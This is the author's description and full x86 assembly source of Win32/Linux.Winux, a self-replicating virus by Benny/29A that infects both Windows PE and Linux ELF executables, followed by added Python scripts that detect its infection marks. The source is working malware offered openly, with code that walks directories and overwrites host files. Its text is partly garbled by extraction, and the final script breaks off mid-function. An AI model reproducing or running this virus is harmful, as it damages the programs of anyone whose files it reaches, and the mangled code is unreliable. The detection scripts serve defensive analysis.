Win32.Winux.txt Wed Nov 21 13:30: ; ; : Win32/Linux.Winux : ; ; : by Benny/29A : ;
Heya ppl, lemme introduce you my first multi-platform virus, the world's first PE/ELF infector.

The idea of the first Win32/Linux virus came to my head when I was learning Linux viruses. I'm not a Linux expert, I couldn't code for Linux in assembler - I am familiar with Intel syntax, AT&T is a bit chaotic for me. However, I decided to learn more about Linux coding and leave my place of newbie. I was always fascinated by the Linux scene and low-level programming under Linux, but I never knew much about it. I wanted to code a virus for Linux and learn from it. But becoz there already exist some viruses and I knew I wouldn't be able to bring any new technique, I decided to code something unique -> a Win32/Linux compatible multi-platform infector. And here you can find the result of my trying. Now, after all, I've got some valuable experiencez and I'm glad for that. Coding/debugging in Linux was hard for me, but I had fun and I learned a lot. And that's the most important.

- Technical details -

The virus itself ain't much. It's not big, it's not complicated, it's not resident nor polymorphic.. I wanted the virus to be like this. Just to show something new, show that something never seen before is possible and how it can be coded.

The virus is divided into two partz: the Win32 part and the Linux part. Every part is able to infect both PE and ELF filez. This source is designed to be compiled by TASM under Win32; nevertheless it can infect Linux programz, and so it will then be able to be executed in a Linux environment (and there it is also able to infect filez with the Win32 part, which can be executed in a Win32 environment etc etc etc...).

Win32 part: The virus infects PE filez by overwriting the .reloc section, so it does not enlarge the host file size. Filez that don't have a .reloc section big enough for the virus code can't be infected (explorer.exe can be used to test infection capabilities). It can pass thru the directory tree by the well known "dotdot" method ("cd ..") and there infects all PE and ELF filez - the virus does not check extensionz, it analyses the victim's internal format and then decidez what to do. When all filez are passed and/or infected the virus will execute the host code.

In detail, wcheckinfect (below) only touches a PE that passes these tests: it is not a directory entry, it is between 4000h bytes and 4 GB in size, it is an i386 IMAGE_FILE_EXECUTABLE_IMAGE that is neither a DLL, a system file nor a native-subsystem image, it has more than one section, its base relocation directory is non-empty and starts exactly at the VirtualAddress of the last section, and that section's SizeOfRawData is at least virus_end-start+500 bytes. Infection then clears the base relocation directory entry, rounds the section's VirtualSize up to SectionAlignment if the body does not fit, points AddressOfEntryPoint at the section, patches the original entry point and ImageBase into the body, copies the body over the section's raw data and sets IMAGE_SCN_MEM_WRITE on the section. A file without relocations is left alone, but the directory entry of an infected one is zeroed, so the host can no longer be relocated by the loader.

Linux part: The virus infects ELF filez by overwriting the host code with the viral code. The original host code is stored at the end of the host file. It can infect all filez (both PE and ELF) in the current directory, also without checking file extensionz. When all filez are passed and/or infected the virus will restore the host code (overwrite itself with the original host code) and execute it.

For ELF targets (winfectelf and linfectelf below) e_machine must be EM_386 (3); the section chosen is the first section header whose sh_addr + sh_size lies above e_entry, it must be at least virtual_end-start bytes long, and it is skipped when its first dword already matches the first dword of the virus body (the infection check). The displaced virtual_end-start bytes of host code are appended at EOF, the file's original length is recorded in l_lseek, and e_entry is advanced by linuxstart-start so that the Linux entrypoint inside the body runs first. On execution the Linux part copies itself to the stack, mprotect()s the host's code pages read/write/execute, reads the saved bytes back over itself from the recorded offset, and jumps to the restored host entrypoint.

Well, you are probably asking how it is possible that the virus can infect Win32 appz from a Linux environment and Linux appz from a Win32 environment. Yeah, many ppl already asked me. For instance, under some emulator. There exist some emulatorz (win4lin, wine etc..) which are often used to execute Win32 appz under Linux. Also, I know many ppl that have a partition specially reserved for CD burning, where they store both Win32 and Linux programz. A virus executed from there has no problemz with infection, heh ;)

Does this virus work? Heh, sure it does. I tested it on Win98, Win2000 and RedHat 7.0, and it worked without any problemz. However, if you find any problemz, don't be shy and send me a bug report ;-P

- Licence agreement -

This virus is covered by the GPL - GNU General Public Licence. All crucial facts can be found there. Read it before using!

- Last notez -

While I was finishing Universe and coding Winux, many personal thingz happened to me. Again such a depressive season as only winter can bring fell down on me.. I'm finishing my high school, last year, many examz (and I know nothing, you know that feeling, heh :) etc. The end of this stage of my life is getting closer and I don't know how the next one will be for me, what it will take and bring to me. I'm looking forward to summer, the best season of the year: no depression, no school, no fucking problemz I still have and can't hold them all..

c ya l8r, somewhere in timespace

Benny / 29A
benny@post.cz
(c) March, 2001
Czech Republic

.model flat
include win32api.inc
include useful.inc
include mz.inc
include pe.inc

.data
db ?

.code
Start: setup SEH frame call gdelta gdelta: pop ebp ebp=delta offset call get_base get K32 base address call get_apis find addresses of APIz lea call f_infect: eax,[ebp + prev_dir - gdelta] eax MAX_PATH [ebp + a_getcurrentdirectorya - gdelta] get current directory 20 pop ecx 20 passes in directory tree ecx
direct action - infect all PE filez in directory lea esi,[ebp + WFD - gdelta] WIN32_FIND_DATA structure esi save its *.* search for all filez call [ebp + a_findfirstfilea - gdelta] find first file inc eax je e_find quit if not found dec eax eax save search handle to stack f_next: call wcheckinfect infect found file esi save WFD structure dword ptr [esp+4] and search handle from stack call [ebp + a_findnextfilea - gdelta]find next file test eax,eax jne f_next and infect it f_close:call [ebp + a_findclose - gdelta] close search handle mov esi,[ebp + a_setcurrentdirectorya - gdelta] call esi go upper in directory tree pop ecx loop f_infect and again.. lea eax,[ebp + prev_dir - gdelta] eax call esi go back to original directory remove SEH frame extrn ExitProcess mov eax,offset ExitProcess h original_ep = dword ptr $-4 add eax,400000h image_base = dword ptr $-4 jmp eax and go back to host program INFECT FILE (Win32 version) wcheckinfect Proc setup SEH frame and dword ptr [ebp + sucelf - gdelta],0 test [esi.wfd_dwfileattributes], FILE_ATTRIBUTE_DIRECTORY jne end_seh discard directory entries xor ecx,ecx cmp [esi.wfd_nfilesizehigh],ecx jne end_seh discard files >4GB mov eax,[esi.wfd_nfilesizelow] cmp eax,4000h jb end_seh discard small filez mov [ebp + l_lseek - gdelta],eax xor lea call inc eax,eax eax FILE_ATTRIBUTE_NORMAL OPEN_EXISTING eax eax GENERIC_READ or GENERIC_WRITE eax,[esi.wfd_szfilename] eax [ebp + a_createfilea - gdelta] open file eax
je end_seh dec eax mov [ebp + hfile - gdelta],eax cdq call cdq xchg jecxz mov edx edx edx PAGE_READWRITE edx eax [ebp + a_createfilemappinga - gdelta] eax,ecx end_cfma [ebp + hmapfile - gdelta],ecx edx edx edx FILE_MAP_WRITE ecx map file to address space call [ebp + a_mapviewoffile - gdelta] xchg eax,ecx jecxz end_mvof mov [ebp + lpfile - gdelta],ecx jmp n_fileopen close_file: h lpfile = dword ptr $-4 unmap file call [ebp + a_unmapviewoffile - gdelta] end_mvof: h hmapfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] end_cfma: mov ecx, h was it linux program (ELF)? sucelf = dword ptr $-4 jecxz c_close no, close that file call dword ptr [ebp + hfile - gdelta] [ebp + a_setfilepointer - gdelta] go to EOF 0 lea eax,[ebp + sucelf - gdelta] eax virtual_end-start h a_mem = dword ptr $-4 dword ptr [ebp + hfile - gdelta] call [ebp + a_writefile - gdelta] write there orig. program part MEM_RELEASE 0 dword ptr [ebp + a_mem - gdelta] call [ebp + a_virtualfree - gdelta] and deallocate used memory c_close: h hfile = dword ptr $-4 call [ebp + a_closehandle - gdelta] close file jmp end_seh and quit n_fileopen: call check_elf
je winfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne close_file call check_pe jne close_file is it Win32 program (PE)? important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne close_file mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je close_file test ax,image_file_dll jne close_file test ax,image_file_system jne close_file mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne close_file movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je close_file call header&relocs get PE headerz and check for relocs je close_file quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne close_file cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb close_file is it large enough? ad xor mov stosd stosd eax,eax edi,edx erase relocs record call set_alignz align section variable dword ptr [ebp + original_ep - gdelta] dword ptr [ebp + image_base - gdelta] save used variablez mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - gdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - gdelta],eax set variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[ebp + lpfile - gdelta] lea esi,[ebp + Start - gdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus body pop dword ptr [ebp + image_base - gdelta] pop dword ptr [ebp + original_ep - gdelta] restore used variablez or dword ptr [edi.sh_characteristics],image_scn_mem_write jmp close_file set flag and quit wcheckinfect EndP INFECT LINUX PROGRAM (Win32 version) winfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3
jne close_file call get_elf get elf headerz p_sectionz: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section does EP fit to this section? add esi,edx no, get to next record loop p_sectionz ECX-timez jmp close_file invalid ELF, quit got_section: mov eax,[ebp + Start - gdelta] mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je close_file infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb close_file must be large enough PAGE_READWRITE MEM_RESERVE or MEM_COMMIT eax 0 call [ebp + a_virtualalloc - gdelta] test eax,eax allocate buffer for host code je close_file mov [ebp + a_mem - gdelta],eax ad mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi esi xchg eax,edi rep movsb copy host code to our buffer pop edi lea esi,[ebp + Start - gdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus body add dword ptr [edi+18h],linuxstart-start mov [ebp + sucelf - gdelta],edi jmp close_file set semaphore and quit winfectelf EndP this procedure can retrieve API addresses get_apis Proc lea esi,[ebp + crc32s - gdelta] get ptr to CRC32 values of APIs lea edi,[ebp + a_apis - gdelta] where to store API addresses crc32c how many APIs do we need pop ecx in ECX... g_apis: eax save K32 base call get_api stosd save address test eax,eax je q_gpa quit if not found add esi,4 move to next CRC32 value loop g_apis search for API addresses in a loop end_seh:@seh_removeframe remove SEH frame
restore all registers and quit from procedure jmp end_host quit if error get_apis EndP this procedure can retrieve address of given API get_api Proc ad store all setup SEH frame mov edi,[eax.mz_lfanew] move to PE header add edi,eax... mov ecx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_size] jecxz end_gpa quit if no exports mov ebx,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddress] mov edx,eax get address of export table add edx,[ebx.ed_addressofnames] address of API names mov ecx,[ebx.ed_numberofnames] number of API names mov edi,edx dword ptr [esi] save CRC32 to stack mov ebp,eax xor eax,eax APIname: eax mov esi,ebp get base add esi,[edx+eax*4] move to API name esi save go to the end of string sub esi,[esp] get string size mov edi,esi move it to EDI pop esi restore address of API name call CRC32 calculate CRC32 of API name cmp eax,[esp+4] is it right API? je g_name yeah, we got it inc eax increment counter loop APIname and search for next API name end_gpa:xor eax, eax set flag remove SEH frame mov [esp.pushad_eax],eax save value to stack restore all registers quit from procedure g_name: pop edx mov edx,ebp add edx,[ebx.ed_addressofordinals] movzx eax,word ptr [edx+eax*2] cmp eax,[ebx.ed_numberoffunctions] jae end_gpa-1 mov edx,ebp base of K32 add edx,[ebx.ed_addressoffunctions] address of API functions add ebp,[edx+eax*4] get API function address xchg eax,ebp we got address of API in EAX jmp ok_gpa quit get_api EndP this procedure can retrieve base address of K32 get_base Proc ebp store EBP call gdlt get delta offset gdlt: pop ebp to EBP mov eax, h get lastly used address last_kern = dword ptr $-4 call check_kern is this address valid?
jecxz end_gb yeah, we got the address call gb_table jump over the address table dd 077E00000h NT/W2k dd 077E80000h NT/W2k dd 077ED0000h NT/W2k dd 077F00000h NT/W2k dd 0BFF70000h 95/98 gb_table: pop edi get pointer to address table 4 get number of items in the table pop esi to ESI gbloop: mov eax,[edi+esi*4] get item call check_kern is address valid? jecxz end_gb yeah, we got the valid address dec esi decrement ESI test esi,esi end of table? jne gbloop nope, try next item call scan_kern scan the address space for K32 end_gb: pop ebp restore EBP quit check_kern: check if K32 address is valid mov ecx,eax make ECX!= 0 ad store all setup SEH frame movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne end_ck nope mov ebx,[eax.mz_lfanew] get pointer to PE header add ebx,eax normalize it mov ebx,[ebx] get four bytes add ebx,-"ep" is it PE header? jne end_ck nope xor ecx,ecx we got K32 base address mov [ebp + last_kern - gdlt],eax save K32 base address remove SEH frame mov [esp.pushad_ecx],ecx save ECX restore all registers if ECX == 0, address was found SEH_hndlr macro macro for remove SEH frame restore all registers add dword ptr [ebp + baddr - gdlt],1000h explore next page jmp bck continue execution endm scan_kern: scan address space for K32 bck: ad store all setup SEH frame mov eax, h starting/last address baddr = dword ptr $-4 movzx edx,word ptr [eax] get two bytes add edx,-"zm" is it MZ header? jne pg_flt nope mov edi,[eax.mz_lfanew] get pointer to PE header add edi,eax normalize it mov ebx,[edi] get four bytes add ebx,-"ep" is it PE header? jne pg_flt nope mov ebx,eax mov esi,eax add ebx,[edi.nt_optionalheader.oh_directoryentries.de_export.dd_virtualaddress] add esi,[ebx.ed_name] mov esi,[esi] add esi,- NREK je end_sk
pg_flt: xor ecx,ecx we got K32 base address mov [ecx],esi generate PAGE FAULT! search again... end_sk: mov [ebp + last_kern - gdlt],eax save K32 base remove SEH frame mov [esp.pushad_eax],eax save EAX - K32 base get_base EndP restore all registers CRC32: ecx procedure for calculating CRC32s edx at run-time ebx xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0edb8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jne NextByteCRC not edx not ecx pop ebx mov eax,edx rol eax,16 mov ax,cx pop edx pop ecx signature db 0, [Win32/Linux.Winux] multi-platform virus by Benny/29A,0 little signature of mine ;-) Viral entrypoint in Linux programz LinuxStart: eax reserve variable for return to host ad mov ebx,[esp.cpushad+8] get command line call lgdelta lgdelta:pop ebp ebp=delta offset mov ecx,end_end_lhost-end_lhost sub esp,ecx mov edi,esp lea esi,[ebp + end_lhost - lgdelta] rep movsb copy virus to stack and jump there jmp esp (becoz we need to restore host code back) end_lhost Proc ebx 125
lea ebx,[ebp + Start - lgdelta] and ebx,0fffff000h mov ecx,3000h mov edx,7 int 80h deprotect code section pop ebx 5 xor ecx,ecx int 80h open host file xchg eax,ebx test ebx,ebx jns read_host q_host: xor eax,eax inc eax -1 pop ebx int 80h quit if error read_host: 19 mov ecx, h l_lseek = dword ptr $-4 cdq int 80h seek to saved host code (EOF - some bytez) test eax,eax js q_host ad 5 call cur_dir db.,0 cur_dir:pop ebx xor ecx,ecx cdq int 80h get current directory descriptor xchg eax,ebx inf_dir: 89 lea ecx,[ebp + WFD - lgdelta] int 80h get file from directory xchg eax,ecx jecxz cldir no more filez.. add eax,10 call lcheckinfect try to infect it jmp inf_dir and look for another file cldir: 6 int 80h close directory descriptor 3 lea ecx,[ebp + Start - lgdelta] mov edi,ecx mov edx,virtual_end-start int 80h restore host code test eax,eax js q_host 6 int 80h close host file descriptor add esp,end_end_lhost-end_lhost mov [esp.cpushad],edi write host entrypoint address
and jump to there INFECT FILE (Linux version) lcheckinfect Proc ad xchg eax,ebx 5 cdq inc edx inc edx mov ecx,edx int 80h open file xchg eax,ebx test ebx,ebx jns c_open c_open: mov [ebp + f_handle - lgdelta],ebx 19 xor ecx,ecx int 80h seek to EOF = get file size mov [ebp + l_lseek - lgdelta],eax save it ecx ebx inc ecx ecx inc ecx inc ecx ecx eax xor ecx,ecx ecx mov ebx,esp 90 int 80h map file to address space add esp,24 cmp eax,0fffff000h jbe c_mmap quit if error jmp c_file c_mmap: mov ecx,eax mov [ebp + fm_handle - lgdelta],eax ad call check_elf je linfectelf is it Linux program (ELF)? add ax,-image_dos_signature jne c_mfile call check_pe jne c_mfile is it Win32 program (PE)? some important chex cmp word ptr [esi.nt_fileheader.fh_machine],image_file_machine_i386 jne c_mfile mov ax,[esi.nt_fileheader.fh_characteristics] test ax,image_file_executable_image je c_mfile test ax,image_file_dll jne c_mfile test ax,image_file_system jne c_mfile mov al,byte ptr [esi.nt_fileheader.oh_subsystem] test al,image_subsystem_native jne c_mfile
movzx eax,word ptr [esi.nt_fileheader.fh_numberofsections] dec eax test eax,eax je c_mfile call header&relocs get PE headerz and check for relocs je c_mfile quit if no relocs mov ebx,[edi.sh_virtualaddress] cmp eax,ebx jne c_mfile cmp [edi.sh_sizeofrawdata],virus_end-start+500 jb c_mfile is it large enough? ad xor mov stosd stosd eax,eax edi,edx clear relocs record call set_alignz align section variable mov eax,[esi.nt_optionalheader.oh_addressofentrypoint] mov [esi.nt_optionalheader.oh_addressofentrypoint],ebx mov [ebp + original_ep - lgdelta],eax mov eax,[esi.nt_optionalheader.oh_imagebase] mov [ebp + image_base - lgdelta],eax set some important variablez ad mov edi,[edi.sh_pointertorawdata] add edi,[esp+24] lea esi,[ebp + Start - lgdelta] mov ecx,virus_end-start rep movsb overwrite relocs by virus code or dword ptr [edi.sh_characteristics],image_scn_mem_write set flag c_mfile: 91 int 80h unmap file c_file: 6 mov ebx,[ebp + f_handle - lgdelta] int 80h close file descriptor and quit lcheckinfect EndP INFECT LINUX PROGRAM (Linux version) linfectelf Proc mov edi,ecx movzx eax,word ptr [edi+12h] cmp eax,3 jne c_mfile call get_elf get ELF headerz p_sectionz2: mov eax,[esi+0ch] virtual address add eax,[esi+14h] virtual size cmp ebx,eax jb got_section2 does EP fit to this section? add esi,edx no, get to next record loop p_sectionz2 ECX-timez jmp c_mfile invalid ELF, quit got_section2: mov eax,[ebp + Start - lgdelta]
mov ecx,[esi+10h] add ecx,edi cmp [ecx],eax je c_mfile infection check mov eax,[esi+14h] cmp eax,virtual_end-start jb c_mfile is it large enough? sub esp,eax create buffer in stack mov [ebp + s_mem - lgdelta],eax add dword ptr [edi+18h],linuxstart-start mov ecx,[esi+14h] mov esi,[esi+10h] add esi,edi mov eax,esi mov edi,esp rep movsb copy original host code there mov edi,eax lea esi,[ebp + Start - lgdelta] mov ecx,virtual_end-start rep movsb overwrite host code by virus 91 mov ebx,[ebp + fm_handle - lgdelta] int 80h unmap file 19 mov ebx,[ebp + f_handle - lgdelta] xor ecx,ecx cdq inc edx inc edx int 80h go to EOF 4 mov ecx,esp mov edx,virtual_end-start int 80h write there original host code add esp,[ebp + s_mem - lgdelta] correct stack jmp c_file and close the file linfectelf EndP check if it is Linux program (ELF) check_elf Proc mov eax,[ecx] eax add eax,-464c457fh check_elf EndP check if it is Win32 program (PE) check_pe Proc mov eax,[ecx.mz_lfanew] add eax,ecx xchg eax,esi mov eax,[esi] add eax,-image_nt_signature check_pe EndP
get some variablez and check for relocationz in PE file header&relocs Proc imul eax,eax,image_sizeof_section_header movzx edx,word ptr [esi.nt_fileheader.fh_sizeofoptionalheader] lea edi,[eax+edx+image_sizeof_file_header+4] add edi,esi lea edx,[esi.nt_optionalheader.oh_datadirectory.de_basereloc.dd_virtualaddress] mov eax,[edx] test eax,eax header&relocs EndP align section variable set_alignz Proc mov eax,virtual_end-start cmp eax,[edi.sh_virtualsize] jb o_vs mov ecx,[esi.nt_optionalheader.oh_sectionalignment] cdq div ecx test edx,edx je o_al inc eax o_al: mul ecx mov [edi.sh_virtualsize],eax o_vs: set_alignz EndP get some important variablez from Linux program (ELF) get_elf Proc mov ebx,[edi+18h] EP mov esi,[edi+20h] section header add esi,edi normalize movzx edx,word ptr [edi+2eh] size of section header movzx ecx,word ptr [edi+30h] number of sectionz get_elf EndP end_end_lhost: end_lhost EndP gpl db This GNU program is covered by GPL.,0 licence agreement ;-) CRC32s of used APIz crc32s: dd 0AE17EBEFh FindFirstFileA dd 0AA700106h FindNextFileA dd 0C200BE21h FindClose dd 08C892DDFh CreateFileA dd 096B2D96Ch CreateFileMappingA dd 0797B49ECh MapViewOfFile dd B42h UnmapViewOfFile dd A9Dh CloseHandle dd Eh VirtualAlloc dd 02AAD1211h VirtualFree dd h WriteFile dd D42h SetFilePointer dd 0EBC6C18Bh GetCurrentDirectoryA dd 0B2DBD7DCh SetCurrentDirectoryA dd 07495B3ADh OutputDebugStringA crc32c = ($-crc32s)/4 number of APIz virus_end:
addresses of APIz a_apis: a_findfirstfilea dd? a_findnextfilea dd? a_findclose dd? a_createfilea dd? a_createfilemappinga dd? a_mapviewoffile dd? a_unmapviewoffile dd? a_closehandle dd? a_virtualalloc dd? a_virtualfree dd? a_writefile dd? a_setfilepointer dd? a_getcurrentdirectorya dd? a_setcurrentdirectorya dd? a_outputdebugstringa dd? f_handle dd? file handle fm_handle dd? file mapping handle s_mem dd? size of host code (for stack manipulationz) WFD WIN32_FIND_DATA? WIN32_FIND_DATA structure prev_dir db MAX_PATH dup (?)original directory virtual_end: ends End Start that's all folx, wasn't that kewl? ;-)
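The Win32 infection path (wcheckinfect above) leaves a recognisable pattern in the PE headers: the base relocation directory entry is zeroed, AddressOfEntryPoint is set to the VirtualAddress of the last section, that section gains IMAGE_SCN_MEM_WRITE, and the body carries the "[Win32/Linux.Winux]" signature string. The following checker is an added example written for this page, not code from Benny's source or from any 29A tool; it assumes PE32 input (the only format the listing targets) and the two-section PE it builds is constructed here purely for the demonstration.

```python
"""Report the marks the Win32 part of Winux leaves on a PE32 file.

Added example, not part of the original listing.  Only the header fields
the listing touches are examined; the sample PE from build_sample() is a
constructed stand-in, not a real binary.
"""
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_SCN_MEM_WRITE = 0x80000000
# Text of the "signature db" line in the listing.
SIGNATURE = b"[Win32/Linux.Winux] multi-platform virus by Benny/29A"


def parse_pe32(data):
    """Return machine, entry point, base-reloc directory and section table."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    fh = e_lfanew + 4
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, fh)
    opt = fh + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (the i386 format Winux targets) is handled")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    # Data directory 5 (BASERELOC) starts at +96 in a PE32 optional header.
    reloc_rva, reloc_size = struct.unpack_from("<II", data, opt + 96 + 5 * 8)
    sections = []
    for i in range(nsec):
        off = opt + opt_size + i * 40
        name = data[off:off + 8].rstrip(b"\0")
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append(dict(name=name, vsize=vsize, va=va,
                             rawsize=rawsize, rawptr=rawptr, chars=chars))
    return dict(machine=machine, entry=entry, reloc_rva=reloc_rva,
                reloc_size=reloc_size, sections=sections)


def winux_indicators(data):
    """List the Winux infection marks found; an empty list means none."""
    pe = parse_pe32(data)
    found = []
    if pe["machine"] != IMAGE_FILE_MACHINE_I386 or not pe["sections"]:
        return found
    last = pe["sections"][-1]          # wcheckinfect only ever targets the last section
    if last["name"] == b".reloc" and pe["reloc_rva"] == 0 and pe["reloc_size"] == 0:
        found.append("base relocation directory zeroed although .reloc exists")
    if pe["entry"] == last["va"]:
        found.append("entry point moved to the start of the last section")
    if last["name"] == b".reloc" and last["chars"] & IMAGE_SCN_MEM_WRITE:
        found.append(".reloc section marked IMAGE_SCN_MEM_WRITE")
    raw = data[last["rawptr"]:last["rawptr"] + last["rawsize"]]
    if SIGNATURE in raw:
        found.append("Winux signature string in the last section")
    return found


def build_sample(infected):
    """Construct a minimal two-section PE32; infected=True applies Winux's header edits."""
    entry, reloc_dir, reloc_chars = 0x1000, (0x2000, 0x10), 0x42000040
    reloc_raw = b"\0" * 0x200
    if infected:
        entry, reloc_dir = 0x2000, (0, 0)        # EP -> .reloc, directory cleared
        reloc_chars |= IMAGE_SCN_MEM_WRITE
        reloc_raw = SIGNATURE.ljust(0x200, b"\0")
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIII", 0x10B, 6, 0, 0x200, 0x200, 0, entry, 0x1000, 0x2000)
    opt += struct.pack("<IIIHHHHHHIIIIHHIIIIII", 0x400000, 0x1000, 0x200, 4, 0, 0, 0, 4, 0,
                       0, 0x3000, 0x400, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[5] = reloc_dir
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".reloc", 0x200, 0x2000, 0x200, 0x600, 0, 0, 0, 0, reloc_chars)
    headers = (dos + b"PE\0\0" + file_hdr + opt + sec).ljust(0x400, b"\0")
    return headers + b"\xC3" * 0x200 + reloc_raw


if __name__ == "__main__":
    for flag in (False, True):
        print("infected" if flag else "clean", winux_indicators(build_sample(flag)))
```

The signature string is the only strong indicator; the three header checks are heuristics that a packer or an unusual linker layout can also trigger, so treat them as a score rather than a verdict. Feed real files with `winux_indicators(open(path, "rb").read())`.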
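get_elf and the p_sectionz loops read the ELF32 header by raw offset: [edi+18h] is e_entry, [edi+20h] e_shoff, [edi+2eh] e_shentsize, [edi+30h] e_shnum, and +0Ch/+10h/+14h in each section header are sh_addr, sh_offset and sh_size; [edi+12h] is e_machine, which must be 3 (EM_386). The following is an added example, not part of Benny's listing, that names those fields, picks the section the loop would pick for a given entry point, applies the size gate, and measures bytes appended after the section-header table, which is where both infection paths write the displaced host code. The sample ELF is constructed here and is not a real binary.

```python
"""ELF32 fields used by Winux, the section it would target, and trailing data.

Added example, not part of the original listing.  Assumes a little-endian
ELFCLASS32 file whose section-header table is the last thing in the file,
which is how linkers of the era laid out executables.
"""
import struct

EM_386 = 3          # the only e_machine winfectelf/linfectelf accept
SHDR_SIZE = 40      # sizeof(Elf32_Shdr)


def parse_elf32(data):
    """Return e_machine, e_entry, section-table geometry and sh_addr/offset/size per section."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELFCLASS32 little-endian is handled here")
    e_machine, = struct.unpack_from("<H", data, 0x12)
    e_entry, = struct.unpack_from("<I", data, 0x18)
    e_shoff, = struct.unpack_from("<I", data, 0x20)
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x2E)
    sections = []
    for i in range(e_shnum):
        off = e_shoff + i * e_shentsize
        addr, offset, size = struct.unpack_from("<III", data, off + 0x0C)
        sections.append(dict(addr=addr, offset=offset, size=size))
    return dict(machine=e_machine, entry=e_entry, shoff=e_shoff,
                shentsize=e_shentsize, shnum=e_shnum, sections=sections)


def target_section(elf):
    """Index of the first section with sh_addr + sh_size > e_entry: exactly the
    p_sectionz choice, including its lack of a lower-bound check."""
    for i, s in enumerate(elf["sections"]):
        if elf["entry"] < s["addr"] + s["size"]:
            return i
    return None


def would_infect(elf, body_size):
    """The listing's gate: EM_386 and a target section at least body_size bytes long
    (the already-infected check compares the section's first dword and is omitted)."""
    if elf["machine"] != EM_386:
        return False
    i = target_section(elf)
    return i is not None and elf["sections"][i]["size"] >= body_size


def overlay_length(data, elf):
    """Bytes past the end of the section-header table, where Winux appends host code."""
    table_end = elf["shoff"] + elf["shnum"] * elf["shentsize"]
    return max(0, len(data) - table_end)


def build_sample(appended=b""):
    """Constructed ELF32/i386: header, a 256-byte .text of ret instructions, a null
    section header plus one for .text, then optional appended bytes."""
    text_off, text_size, base = 0x34, 0x100, 0x08048000
    shoff = text_off + text_size
    ehdr = b"\x7fELF" + bytes([1, 1, 1, 0]) + b"\0" * 8
    ehdr += struct.pack("<HHIIIIIHHHHHH", 2, EM_386, 1, base + text_off, 0, shoff,
                        0, 52, 32, 0, SHDR_SIZE, 2, 0)
    text_sh = struct.pack("<IIIIIIIIII", 1, 1, 6, base + text_off, text_off, text_size, 0, 0, 16, 0)
    return ehdr + b"\xC3" * text_size + b"\0" * SHDR_SIZE + text_sh + appended


if __name__ == "__main__":
    sample = build_sample(b"\x90" * 0x40)
    elf = parse_elf32(sample)
    print("target section:", target_section(elf),
          "trailing bytes:", overlay_length(sample, elf))
```

A non-zero overlay on a binary whose section table used to end the file is worth a look, but it is not proof: a legitimate overlay, a stripped section table (e_shnum 0 makes the estimate meaningless) or a tool that rewrote the file can produce the same result, so pair it with the e_entry position inside the chosen section.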
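get_api resolves imports without names: it walks kernel32's AddressOfNames table, runs each name through the CRC32 routine and compares the result with the crc32s table. The listing's routine starts from 0FFFFFFFFh, shifts right with the reflected polynomial 0EDB88320h (the 8320h/0EDB8h xor constants on the ax/bx halves) and complements the result, which is the standard CRC-32, so binascii.crc32 must agree with it. The following is an added example, not part of Benny's listing: a port of that routine and the reverse lookup an analyst performs with it, hashing a candidate list to turn the constants back into names. The candidate list is an assumption for the demonstration (a real run would use every export of kernel32), and only the crc32s entries that survived extraction intact are included.

```python
"""Port of the get_api CRC32 and a hash-to-name lookup for the crc32s table.

Added example, not part of the original listing.  CANDIDATES is a constructed
stand-in for a real export list.
"""
import binascii

POLY = 0xEDB88320   # the EDB8h:8320h pair from NextBitCRC, as one 32-bit value


def crc32_29a(name: bytes) -> int:
    """NextByteCRC/NextBitCRC from the listing: one byte, then eight shift/xor steps."""
    crc = 0xFFFFFFFF                  # xor ecx,ecx / dec ecx / mov edx,ecx
    for b in name:
        crc ^= b                      # xor al,cl on the low byte
        for _ in range(8):            # dh=8 iterations of NextBitCRC
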